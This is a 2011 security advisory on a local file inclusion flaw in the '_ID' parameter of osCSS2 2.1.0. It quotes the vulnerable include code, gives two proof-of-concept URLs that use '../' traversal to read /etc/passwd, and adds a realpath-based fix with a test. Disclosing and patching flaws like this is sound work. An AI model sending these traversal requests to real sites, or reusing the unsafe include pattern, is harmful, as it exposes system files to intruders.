SSCHADV2011-034 - osCSS2 "_ID" parameter Local file inclusion
Advisory: osCSS2 "_ID" parameter Local file inclusion
Advisory ID: SSCHADV2011-034
Author: Stefan Schurtz
Affected Software: Successfully tested on osCSS2 2.1.0 (latest version)
Vendor URL:
Vendor Status: Fixed in svn branch 2.1.0 and reported in develop version 2.1.1
EDB-ID: 18099
======================
Vulnerability Description:
======================
The "_ID" parameter in osCSS2 2.1.0 is prone to a local file inclusion (LFI) vulnerability.
======================
Vulnerable code
======================
//.htaccess
RewriteRule ^shopping_cart.php(.{0,})$ content.php?_ID=shopping_cart.php&%{QUERY_STRING}

//content.php
require($page->path_gabarit());

// includes/classes/page.php
public function pile_file_lang($path_file){
  global $lang;
  if(substr($path_file,0,strlen(DIR_FS_CATALOG)) !=DIR_FS_CATALOG) $path_file= DIR_FS_CATALOG.$path_file;
  if(!in_array($path_file,(array)$this->PileFileLang)) include_once($path_file);
}
==============
PoC-Exploit
==============
http://<target>/catalog/shopping_cart.php?_ID=../../../../../../../../../../../etc/passwd
http://<target>/catalog/content.php?_ID=../../../../../../../../../../../etc/passwd
=====
Solution
=====
Fixed in svn branch 2.1.0 and reported in develop version 2.1.1
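
The advisory does not show the vendor's patch. The following is an added example, not osCSS2 code and not the vendor's fix: one way to canonicalize a requested path and confirm it stays below DIR_FS_CATALOG before it reaches include_once() or require(). The helper name resolve_catalog_include(), the ".php"-only rule and the sample directory tree are assumptions made for illustration.

```php
<?php
// Added example, not osCSS2 code. DIR_FS_CATALOG is the constant used on the page;
// resolve_catalog_include() and the sample tree below are hypothetical.

/**
 * Resolve $path_file below $base and return its canonical path,
 * or null when it does not exist or resolves outside $base.
 */
function resolve_catalog_include(string $path_file, string $base): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // Same prefixing rule as pile_file_lang(): relative names are joined to the catalog root.
    if (strncmp($path_file, $base, strlen($base)) !== 0) {
        $path_file = rtrim($base, '/') . '/' . $path_file;
    }
    // realpath() collapses "../" segments and symlinks; false means the file is absent.
    $real = realpath($path_file);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Compare with a trailing separator so "/srv/catalog_old" does not pass for "/srv/catalog".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    // Only PHP sources are treated as legitimate include targets here (assumption).
    return pathinfo($real, PATHINFO_EXTENSION) === 'php' ? $real : null;
}

// Constructed sample tree so the check can be run offline.
$root = sys_get_temp_dir() . '/oscss_demo_' . getmypid();
mkdir($root . '/catalog/includes', 0700, true);
file_put_contents($root . '/catalog/shopping_cart.php', "<?php // stub\n");
file_put_contents($root . '/secret.txt', "outside the catalog\n");
define('DIR_FS_CATALOG', $root . '/catalog/');

$samples = ['shopping_cart.php', '../secret.txt', 'includes/../../secret.txt', 'missing.php'];
foreach ($samples as $id) {
    $resolved = resolve_catalog_include($id, DIR_FS_CATALOG);
    printf("%-28s => %s\n", $id, $resolved === null ? 'rejected' : 'allowed');
}
// Remove the sample tree.
array_map('unlink', [$root . '/catalog/shopping_cart.php', $root . '/secret.txt']);
array_map('rmdir', [$root . '/catalog/includes', $root . '/catalog', $root]);
```

The prefix comparison runs on the canonical path, so a value that begins with the catalog directory but climbs out of it with "../" is rejected, which the string-prefix test in pile_file_lang() does not catch.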
================
Disclosure Timeline
================
08-Nov-2011 – informed vendor
08-Nov-2011 – release date of this security advisory
08-Nov-2011 – fixed by vendor
08-Nov-2011 – post on BugTraq
====
Credits
====
Vulnerability found and advisory written by Stefan Schurtz.
=======
References
=======
http://oscss.org/
http://forums.oscss.org/2-security/oscss2-id-parameter-local-file-inclusion-t1999.html